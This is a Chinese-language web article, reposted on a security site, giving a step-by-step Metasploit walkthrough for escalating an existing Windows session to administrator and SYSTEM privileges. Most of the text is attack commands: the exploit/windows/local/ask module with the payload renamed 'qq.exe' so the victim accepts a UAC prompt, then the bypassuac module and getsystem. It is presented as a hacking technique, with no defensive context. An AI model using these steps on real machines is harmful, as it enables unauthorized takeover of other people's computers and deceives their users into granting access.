安基网 首页 安全 漏洞挖掘 查看内容

「黑客技术」Msf提高程序运行权限级别提权

2020-2-11 15:23| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 提权大致也就3种方法1. 提高程序运行权限级别2. Uac绕过3. 提权漏洞我这里先用第一种来演示前提是msf已经获取到了 一个sessionGetiud查看用户 是用户权限Getsystem报错 看到是没法提权的接下来 background退到后台 u ...

提权大致也就3种方法

1. 提高程序运行权限级别

2. Uac绕过

3. 提权漏洞


我这里先用第一种来演示

前提是msf已经获取到了 一个session


Getiud查看用户 是用户权限

Getsystem报错 看到是没法提权的

接下来 background退到后台

use exploit/windows/local/ask

加载模块

Show options

Set session 1

设置 session为 刚刚获取到得session

运行后会弹出 uac的拦截

Filename 可以设置文件的名字 伪装文件例如qq使得 用户点击确认

Set filename qq.Exe

接下来 run 运行 等待就可以了

接下来我们就可以看到靶机那边弹出用户控制的框

点击确定

在msf那边就可以获取到一个新的sesion

Getuid

还是用户权限

Getsystem

看到现在已经获取到了管理员权限


Msf绕过uac

use exploit/windows/local/bypassuac 再按几下tab键 可以看到绕过uac还是有很多模块和方法的 例如进程注入 vbs绕过等等

我这里直接用bypassuac模块

Show options

这里只需要设置个session就可以了


Set session 3

Run

执行成功

反弹回来一个session


Getuid

用户权限

Getsystem

Getuid

获取system权限成功



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6792068953574212108/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部